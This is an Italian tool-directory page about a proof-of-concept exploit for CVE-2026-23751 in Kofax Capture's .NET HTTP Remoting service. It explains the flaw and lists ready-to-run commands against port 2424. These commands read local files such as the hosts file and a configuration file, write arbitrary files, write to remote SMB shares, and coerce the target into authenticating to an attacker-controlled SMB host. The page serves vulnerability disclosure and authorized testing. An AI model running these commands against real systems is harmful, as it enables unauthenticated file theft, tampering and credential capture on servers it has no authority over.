Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-23751-poc — Patched RemotingClient per sfruttare CVE-2026-23751 (Tungsten Automation - Kofax Capture lettura/scrittura file non autenticata e coercizione SMB tramite .NET HTTP Remoting) | Kitploit
Strumenti/GitHubGitHub/siebrum/cve-2026-23751-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubsiebrum/cve-2026-23751-poc

CVE-2026-23751-poc

Patched RemotingClient per sfruttare CVE-2026-23751 (Tungsten Automation - Kofax Capture lettura/scrittura file non autenticata e coercizione SMB tramite .NET HTTP Remoting)

Vedi Repository
6h 36m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-23751-poc

Reimplementazione proof-of-concept della tecnica descritta in Code White's NewRemotingTricks, che mira a Tungsten Automation Kofax Capture.

CVE-2026-23751

Titolo: Tungsten Automation - Kofax Capture Lettura/Scrittura File Non Autenticata e Coercizione SMB tramite .NET HTTP Remoting

CVE: CVE-2026-23751

Descrizione

CVE-2026-23751 colpisce Tungsten Automation Kofax Capture e consente a un attaccante remoto non autenticato di interagire con un endpoint .NET HTTP Remoting esposto dal ACService di Kofax Capture.

La vulnerabilità può essere sfruttata per eseguire:

  • Letture arbitrarie di file non autenticate
  • Scritture arbitrarie di file non autenticate
  • Coercizione dell'autenticazione SMB
  • Accesso a file locali accessibili al servizio Kofax Capture
  • Accesso a file remoti tramite percorsi UNC

Il PoC reimplementa la tecnica .NET Remoting rilevante dal progetto NewRemotingTricks di Code White.

Endpoint Interessato

Il PoC prende di mira l'endpoint HTTP Remoting ACService di Kofax Capture:

root@kitploit:~
http://<target>:2424/ACService

La porta 2424 è la porta HTTP Remoting predefinita utilizzata dal servizio interessato.

Utilizzo

Leggere un file locale

L'esempio seguente legge il file hosts di Windows dal target:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts

Un file di configurazione di Kofax Capture può essere letto allo stesso modo:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml

Scrivere un file locale

Un file può essere scritto in una posizione accessibile dal servizio Kofax Capture fornendo il percorso di destinazione seguito dal contenuto:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld

Scrivere su una condivisione SMB remota

La stessa funzionalità può essere utilizzata con un percorso UNC per scrivere su una condivisione SMB remota:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld

La capacità di accedere alla risorsa remota dipende dalle autorizzazioni e dal contesto di sicurezza del servizio Kofax Capture.

Coercizione SMB

È possibile fornire un URI file:// per indurre il target ad accedere a una risorsa SMB remota:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt

Ciò può indurre l'host interessato ad autenticarsi al server SMB controllato dall'attaccante, a seconda dell'ambiente target e della sua configurazione di sicurezza.

Contesto Tecnico

La vulnerabilità coinvolge l'uso di .NET HTTP Remoting da parte del ACService di Kofax Capture.

.NET Remoting supporta vari schemi URI e meccanismi di serializzazione degli oggetti. Interagendo con l'endpoint remoting esposto in un modo specifico, un client non autenticato può indurre il servizio a eseguire operazioni sul file system utilizzando percorsi forniti dal client.

Il PoC dimostra come questo comportamento possa essere utilizzato per:

  • Recuperare file locali
  • Scrivere dati su file locali
  • Accedere a percorsi UNC/SMB remoti
  • Attivare l'accesso a risorse file:// remote

Il PoC attualmente dimostra la scrittura di dati stringa su file. Altri tipi di file e formati di payload possono essere supportati modificando di conseguenza il codice sorgente.

Questa implementazione si basa su ricerche e tecniche presentate in:

Code White - NewRemotingTricks

https://github.com/codewhitesec/NewRemotingTricks/tree/main

Requisiti

  • Windows
  • Accesso di rete al ACService di Kofax Capture del target
  • Istanza di Kofax Capture che espone l'endpoint HTTP Remoting interessato
  • RemotingClient_MBRO_Lazy.exe

Non è richiesta alcuna autenticazione al servizio Kofax Capture per lo sfruttamento.

Disclaimer

Questo repository è fornito esclusivamente per ricerca sulla sicurezza, validazione delle vulnerabilità e test di penetrazione autorizzati.

Non utilizzare questo PoC contro sistemi senza esplicita autorizzazione. L'autore non è responsabile di danni, perdita di dati, accessi non autorizzati o altre conseguenze derivanti dall'uso improprio di questo software.

Riferimenti

  • CVE-2026-23751 — Tungsten Automation Kofax Capture Lettura/Scrittura File Non Autenticata e Coercizione SMB tramite .NET HTTP Remoting
  • Code White - NewRemotingTricks
Scarica lo strumento